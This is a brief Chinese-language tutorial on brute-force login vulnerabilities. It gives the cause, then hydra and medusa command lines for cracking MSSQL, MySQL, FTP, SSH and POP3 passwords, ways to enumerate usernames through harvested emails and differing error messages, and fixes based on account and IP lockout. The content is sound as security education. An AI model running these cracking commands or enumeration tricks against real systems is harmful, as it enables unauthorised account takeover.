暴力破解漏洞

暴力破解漏洞

1.漏洞原理

暴力破解的产生是由于服务器端没有做限制，导致攻击者可以通过暴力的手段破解所需信息。一般来说知道管理员的账户信息，破解的效率会大大增提升。

2.破解工具

# hydra
hydra.exe -l sa -P c:\pass.txt 192.168.1.110 mssql (破解主机sa用户口令)

hydra.exe -L c:\user.txt -P c:\pass.txt 192.168.1.110 mysql (破解Mysql密码)

hydra.exe -l admin -P c:\pass.txt -t 5 192.168.1.110 ftp (破解FTP密码)

hydra.exe -L users.txt -P password.txt -e n -t 5 -vV 192.168.1.110 ssh (破解ssh)

hydra.exe -l root -P pass.txt my.pop3.mail pop3 (破解pop3)

# Medusa(美杜莎)
medusa -h 192.168.195.129 -u root -P /pass.txt -M mysql (破解Mysql密码)

medusa -h 192.168.1.110 -u sa -P /pass.txt -t 5 -f M mssql (破解MSSQL)

medusa -M ssh -H host.txt -U users.txt -p password (破解SSH)

3.漏洞场景

对于暴力破解来说搜集用户名是非常重要的，所以可以使用两种方法
# 通过邮箱搜集，一般来说域名邮箱极有可能是此OA系统的用户

# 通过错误提示，当破解时，网站可能会根据情况有不同的提示，当用户名符合时，可能会提示密码错误，根据这种可以先猜解用户名，再破解密码

4.漏洞修复

# 当用户登录次数超过设置的阈值，则锁定账号

# 当某个IP登录次数超过设置的阈值，则锁定IP